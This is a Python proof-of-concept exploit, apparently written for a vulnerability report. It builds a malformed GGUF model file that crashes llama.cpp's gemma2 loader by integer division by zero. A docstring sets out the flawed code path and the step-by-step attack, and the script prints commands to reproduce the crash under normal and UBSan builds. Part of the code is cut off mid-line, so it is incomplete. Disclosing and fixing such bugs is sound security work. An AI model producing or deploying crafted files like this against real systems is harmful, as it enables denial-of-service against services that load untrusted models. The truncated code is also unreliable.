#!/usr/bin/env python3 """ PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading. Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes: hparams.f_attention_scale = type == LLM_TYPE_27B ? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0))) : 1.0f / std::sqrt(float(hparams.n_embd_head_k)); When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken. If the `attention.head_count` key is omitted from the GGUF file, the n_head_arr stays filled with 0s (from std::fill at line 552), so n_head(0) returns 0. This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero. The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the n_embd_head_k calculation, not the architecture-specific code at line 1347. Platform behavior: - x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136 - ARM64: Silent undefined behavior (ARM SDIV returns 0 for div-by-zero), but UBSan catches it and aborts with exit code 134 Attack vector: 1. Set general.architecture = "gemma2" 2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B) 3. Set gemma2.embedding_length = 4096 (any non-zero value) 4. Set gemma2.context_length = 8192 (required) 5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2) 6. OMIT gemma2.attention.head_count (this is loaded with required=false) 7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero The crash occurs during load_hparams(), before vocab or tensor loading, so no valid vocabulary or tensor data is needed. Confirmed UBSan output: src/llama-model.cpp:1347:61: runtime error: division by zero SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61 """ import struct import os # GGUF constants GGUF_MAGIC = b"GGUF" GGUF_VERSION = 3 GGUF_DEFAULT_ALIGNMENT = 32 # GGUF KV type constants GGUF_TYPE_UINT32 = 4 GGUF_TYPE_FLOAT32 = 6 GGUF_TYPE_STRING = 8 def write_string(f, s): """Write a GGUF string: uint64 length + chars (no null terminator).""" encoded = s.encode('utf-8') f.write(struct.pack(' SIGFPE # ===== Alignment padding ===== # Even with 0 tensors, pad to alignment boundary for spec compliance. current_pos = f.tell() aligned_pos = (current_pos + GGUF_DEFAULT_ALIGNMENT - 1) // GGUF_DEFAULT_ALIGNMENT * GGUF_DEFAULT_ALIGNMENT if aligned_pos > current_pos: f.write(b'\x00' * (aligned_pos - current_pos)) file_size = os.path.getsize(output_path) print(f"[*] Created: {output_path}") print(f"[*] File size: {file_size} bytes") print(f"[*]") print(f"[*] Vulnerability details:") print(f"[*] Architecture: gemma2 (LLM_ARCH_GEMMA2)") print(f"[*] block_count: 46 (triggers LLM_TYPE_27B)") print(f"[*] embedding_length: 4096") print(f"[*] head_count: OMITTED (stays 0 from std::fill)") print(f"[*]") print(f"[*] Crash location: src/llama-model.cpp:1347") print(f"[*] hparams.n_embd / hparams.n_head(0)") print(f"[*] = 4096 / 0") print(f"[*] => integer division by zero (UB)") print(f"[*]") print(f"[*] Test with (x86_64 -- deterministic SIGFPE crash):") print(f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'") print(f"[*] Expected: SIGFPE, exit code 136") print(f"[*]") print(f"[*] Test with UBSan (any platform -- clean UB report):") print(f"[*] cmake -B build-ubsan \\") print(f"[*] -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\") print(f"[*] -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\") print(f"[*] -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\") print(f"[*] -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\") print(f"[*] -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF") print(f"[*] cmake --build build-ubsan -j$(nproc)") print(f"[*] ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'") print(f"[*] Expected: 'runtime error: division by zero', exit code 134") if __name__ == "__main__": output_dir = "/Users/eltarne/Documents/script/gguf_poc" os.makedirs(output_dir, exist_ok=True) output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf") create_gemma2_divzero_gguf(output_path)